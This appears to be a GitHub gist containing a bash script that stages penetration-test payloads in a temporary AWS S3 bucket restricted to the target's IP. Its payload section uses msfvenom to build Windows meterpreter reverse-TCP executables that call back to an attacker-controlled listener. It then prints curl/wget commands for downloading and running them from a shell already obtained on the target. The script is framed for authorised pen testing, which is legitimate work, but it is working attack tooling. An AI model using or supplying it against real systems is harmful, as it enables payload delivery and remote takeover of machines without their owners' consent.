Skip to content

Instantly share code, notes, and snippets.

@tonykarre
Last active February 26, 2022 16:38
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save tonykarre/55dad1d3ddca4b7cdb3a0f339def779b to your computer and use it in GitHub Desktop.
Save tonykarre/55dad1d3ddca4b7cdb3a0f339def779b to your computer and use it in GitHub Desktop.
Dynamically create S3 buckets to stage pen test tools/payloads. Files can only be downloaded by the target.
#! /bin/bash
# Tony Karre
# @tonykarre
#
# payloads-to-s3.sh
#
# Use case:
#
# You are executing a pen test, and you want to temporarily stage payloads and other tools
# on a server outside of your own infrastructure. You also want to make sure that
# those files can only be seen/downloaded from the target IP. When you are finished,
# you want to delete the staging server and its contents. We'll use S3 buckets to achieve this.
#
# Do the following:
#
# 1. Create an AWS S3 bucket with a somewhat random name. We will stage our payloads here.
# 2. Apply a bucket access policy to allow external access from our target IP. By default, nobody has access to it.
# 3. Generate a payload(s)
# 4. Move payload(s) to our new bucket
# 5. Print instructions on how to delete the bucket when we are finished using it.
# Prerequisites:
#
# 1. You have an AWS account.
# 2. You have used the AWS Identity and Access Management (IAM) console to create an IAM user of access type "Programmatic Access".
# 3. In the IAM console, you have attached the policy "AmazonS3FullAccess" to this user, either directly or through an IAM group.
#
# 4. In Kali, you have installed the AWS command-line interface tool:
#
# apt-get install awscli
#
# 5. In Kali, you have created an AWS profile for your new IAM user
#
# root@OS14526:~# aws configure --profile your-desired-profile-name
# AWS Access Key ID [None]: your-20-char-access-key-ID-for-your-IAM-user
# AWS Secret Access Key [None]: your-40-char-secret-access-key-for-your-IAM-user
# Default region name [None]: your-desired-region # example = us-east-1
# Default output format [None]: json
# root@OS14526:~#
#
#
# There are two required script parameters: RHOST and LHOST ip addresses.
#
# RHOST = the target IP, same as you would supply for a Metasploit payload. This IP will be given read access to files in the bucket.
# LHOST = your listener IP, because likely one of your payloads will try to phone home to something. Think Metasploit LHOST.
#
# So a typical scenario might be this:
# 1. you have an unprivileged shell on RHOST.
# 2. on RHOST, you download your payload from the bucket (https URL is generated for you by this script).
# 3. on RHOST, you run the payload (meterpreter in this POC example), which connects back to LHOST.
#
if [ "$#" -ne "2" ];
then
printf "\nusage: $0 RHOST-ip-address LHOST-ip-address\n\n"
printf "RHOST is the metasploit-style IP address of the target remote host that needs access to our S3 bucket.\n"
printf "LHOST is the metasploit-style IP address of the listener for any payloads.\n"
exit ;
fi
RHOST=$1
LHOST=$2
awsprofile="PentestAPIuser" # this is your configured profile name for your aws user (see the aws configure command described above).
bucketprefix="pentest" # this is the first part of our bucket name. Limit this to 20 chars or less.
payloadroot="/var/tmp" # this is the directory where we will generate payload files prior to moving them to S3
# Start by attempting to create an AWS S3 bucket
printf "[+] Creating S3 bucket...\n"
# Generate a name for our bucket. Rules:
#
# Bucket names must be at least 3 and no more than 63 characters long.
# Bucket names must be a series of one or more labels. Adjacent labels are separated by a single period (.).
# Bucket names can contain lowercase letters, numbers, and hyphens. Each label must start and end with a lowercase letter or a number.
# Bucket names must not be formatted as an IP address (e.g., 192.168.5.4).
# When using virtual hosted–style buckets with SSL, the SSL wildcard certificate only matches buckets that do not contain periods.
# To work around this, use HTTP or write your own certificate verification logic.
# We recommend that you do not use periods (".") in bucket names.
# Construct a bucketname that looks something like this:
# pentest-pi54jmqyrfomp8l2gvg7o6c4m7v1wkqstnyefjdg
bucketname=$bucketprefix-$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 40 | head -n 1)
# Build the permissions policy string for the bucket. We want to whitelist our RHOST IP, but nobody else.
# The policy JSON will look like this:
#
# {
# "Version": "2012-10-17",
# "Id": "5cb1caa8-df2b-476e-819a-8bb23b8e1195",
# "Statement": [{
# "Sid": "IPAllow",
# "Effect": "Allow",
# "Principal": "*",
# "Action": ["s3:GetObject"],
# "Resource": "arn:aws:s3:::ourbucket/*",
# "Condition": {
# "IpAddress": {
# "aws:SourceIp": "1.2.3.4/32"
# }
# }
# }]
# }
# I've squeezed all the whitespace out to avoid policy parameter issues when we use this in the command line
policystring='{"Version":"2012-10-17","Id":"'$(uuidgen)'","Statement":[{"Sid":"IPAllow","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::'$bucketname'/*","Condition":{"IpAddress":{"aws:SourceIp":"'$RHOST'/32"}}}]}'
# create the bucket
aws --profile $awsprofile s3 mb s3://$bucketname
if [ $? -eq 0 ]
then
printf "[+] S3 bucket created successfully\n"
else
printf "[-] Failed to create S3 bucket\n"
exit 1
fi
printf "[+] Applying S3 policy to bucket...\n"
# Assign the access policy to the bucket
aws --profile $awsprofile s3api put-bucket-policy --bucket $bucketname --policy $policystring
if [ $? -eq 0 ]
then
printf "[+] Policy successfully assigned to bucket\n"
else
printf "[-] WARNING ------------- Failed to assign policy to bucket!\nDownload attempts from this bucket will fail!\n"
fi
printf "[+] Starting payload generation/move sequence...\n"
#-------------------------------------------------------------
#
# Start of payloads area
#
# Now let's create some example payloads and move them into the bucket.
for port in 80 443; do
msfvenom -a x86 --platform Windows -e generic/none -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$port -f exe > $payloadroot/meterpreter-$port.exe
# move the file into the bucket (an "mv" command deletes the local copy of the file after moving it)
aws --profile $awsprofile s3 mv $payloadroot/meterpreter-$port.exe s3://$bucketname
if [ $? -ne 0 ]
then
printf "\n[-] Failed to copy the file to the S3 bucket\n"
fi
done
#
# End of payloads area
#
#-------------------------------------------------------------
# Lets list the contents of the bucket
printf "\n[+] Payload generation complete. Listing contents of the bucket...\n"
aws --profile $awsprofile s3 ls s3://$bucketname
if [ $? -ne 0 ]
then
printf "\n[-] Failed to list the contents of the S3 bucket\n"
fi
printf "\n[+] Finished.\n\n"
printf "Download files from your bucket like this:\n"
printf " [curl | wget | whatever] https://s3.amazonaws.com/$bucketname/filename\n\n"
printf "You can copy other files into your bucket with this command:\n"
printf " aws --profile $awsprofile s3 cp local-path/filename s3://$bucketname\n\n"
printf "You can list the files in your bucket with this command:\n"
printf " aws --profile $awsprofile s3 ls s3://$bucketname \n\n"
printf "When you are finished with the S3 bucket, delete it (and all files) with this command:\n"
printf " aws --profile $awsprofile s3 rb s3://$bucketname --force\n\n"
printf "Lose the names of your earlier buckets? Get a list of your existing buckets with this command:\n"
printf " aws --profile $awsprofile s3api list-buckets --output text\n\n"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment